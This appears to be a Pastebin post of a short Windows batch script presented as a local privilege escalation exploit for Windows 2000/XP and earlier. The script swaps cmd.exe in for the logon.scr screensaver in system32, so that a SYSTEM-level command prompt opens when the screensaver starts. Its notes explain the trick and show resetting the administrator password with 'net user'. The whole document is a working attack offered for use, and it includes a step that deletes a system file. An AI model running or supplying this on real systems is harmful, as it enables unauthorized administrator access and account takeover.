Advertisement
AN0NT0XIC

Windows 2000,XP And Before Local Privilege Escalation

Oct 2nd, 2015
157
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 0.75 KB | None | 0 0
  1. @echo off
  2. title Windows XP Local Privilege Escalation Exploit
  3. color 0a
  4. cls
  5. cd / && cd windows/system32/
  6. mkdir ghosty && copy logon.scr ghosty\logon.scr && copy cmd.exe ghosty\cmd.exe
  7. del logon.scr && rename cmd.exe logon.scr
  8. echo.
  9. echo.
  10. echo Activate Screensaver And Please Wait For It
  11. echo An Unprotected CMD Will Pop-Up
  12.  
  13.  
  14. (!)NOTES:
  15. short explaination
  16. so in this script we backup the cmd.exe(COMMAND PROMPT) & logon.src(SCREENSAVER)
  17. then we delete logon.scr and rename cmd.exe to logon.scr
  18. we set screensaver and wait for it the system (NT/AUTORITE) will look for screen saver file (logon.scr) but its cmd.exe
  19. so he will execute cmd.exe with higher privilege :) so we can use this to get the administrator account
  20. ex: net user [ADMIN_HERE] [PASS_HERE]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement